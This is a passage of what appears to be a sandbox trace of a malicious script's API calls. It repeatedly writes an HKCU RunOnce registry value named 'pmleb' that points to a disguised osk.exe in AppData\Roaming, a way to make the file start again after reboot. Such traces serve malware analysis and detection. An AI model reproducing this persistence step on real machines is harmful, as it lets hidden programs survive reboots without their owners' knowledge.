0x20cd [0081.878] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.890] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.890] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.890] KillTimer (hWnd=0x20280, uIDEvent=0x20cd) returned 1 [0081.890] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.890] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.890] IUnknown:Release (This=0x787518) returned 0x1 [0081.891] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.891] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.891] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.891] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.891] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.891] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.891] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.891] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.891] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.891] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x52 [0081.891] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.891] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x53 [0081.892] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.892] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x52 [0081.893] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.893] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.893] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.893] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.893] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.893] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.893] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.893] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0081.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.893] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.893] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.894] RegCloseKey (hKey=0x280) returned 0x0 [0081.894] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.894] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.894] SetTimer (hWnd=0x20280, nIDEvent=0x20ce, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ce [0081.894] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.905] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.905] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.906] KillTimer (hWnd=0x20280, uIDEvent=0x20ce) returned 1 [0081.906] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.906] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.906] IUnknown:Release (This=0x787518) returned 0x1 [0081.906] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0081.906] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.906] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.907] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.907] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.907] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.907] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.907] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.907] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.907] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x53 [0081.907] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.907] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x54 [0081.907] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.908] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x53 [0081.908] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.908] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.908] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.908] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.908] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.909] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.909] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.909] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.909] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.909] RegCloseKey (hKey=0x280) returned 0x0 [0081.909] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.909] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.909] SetTimer (hWnd=0x20280, nIDEvent=0x20cf, uElapse=0xa, lpTimerFunc=0x0) returned 0x20cf [0081.909] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.922] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.922] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.922] KillTimer (hWnd=0x20280, uIDEvent=0x20cf) returned 1 [0081.922] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.922] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.922] IUnknown:Release (This=0x787518) returned 0x1 [0081.923] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.923] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.923] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.923] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.923] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.923] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x54 [0081.923] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.923] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x55 [0081.923] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.924] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x54 
[0081.924] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.925] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.925] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.925] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.925] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.925] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.925] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
